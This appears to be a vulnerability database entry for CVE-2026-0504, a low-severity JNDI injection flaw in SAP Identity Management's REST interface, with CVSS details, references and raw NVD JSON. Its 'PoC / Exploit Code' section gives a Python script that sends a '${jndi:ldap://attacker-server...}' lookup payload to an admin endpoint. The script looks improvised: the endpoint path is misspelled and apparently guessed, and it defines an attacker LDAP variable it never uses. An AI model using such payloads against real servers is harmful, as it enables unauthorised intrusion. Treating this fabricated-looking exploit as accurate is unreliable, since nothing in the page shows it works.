CVE-2026-0504

Description

Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability.

CVSS Details

CVSS Score

3.8

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Identity Management (具体版本需查阅SAP官方安全笔记3657998)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-0504 PoC - SAP Identity Management JNDI Injection
# This is a conceptual PoC for educational purposes only

TARGET_URL = "https://vulnerable-server/sap/identiy/rest/api/v1/lookup"
ATTACKER_LDAP = "ldap://attacker-controlled-server:1389/Exploit"

# Authentication headers (requires admin privileges)
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <admin_token>"
}

# Malicious payload with JNDI injection
payload = {
    "lookupName": "${jndi:ldap://attacker-server:1389/Exploit}",
    "searchBase": "ou=users,dc=example,dc=com",
    "searchFilter": "(uid=*)"
}

def exploit_cve_2026_0504():
    """
    Send malicious JNDI injection request to SAP Identity Management REST API
    """
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            verify=False,
            timeout=10
        )
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

if __name__ == "__main__":
    print("Testing CVE-2026-0504 JNDI Injection...")
    exploit_cve_2026_0504()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0504
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0504
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0504/
[4] VulDB https://vuldb.com/cve/CVE-2026-0504
[5] https://me.sap.com/notes/3657998
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0504", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:53.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability."}, {"lang": "es", "value": "Debido a un manejo insuficiente de entrada, la interfaz REST de SAP Identity Management permite a un administrador autenticado enviar solicitudes REST maliciosas especialmente diseñadas que son procesadas por operaciones JNDI sin una neutralización de entrada adecuada. Esto puede llevar a una divulgación limitada o modificación de datos, resultando en un bajo impacto en la confidencialidad y la integridad, sin impacto en la disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}], "references": [{"url": "https://me.sap.com/notes/3657998", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}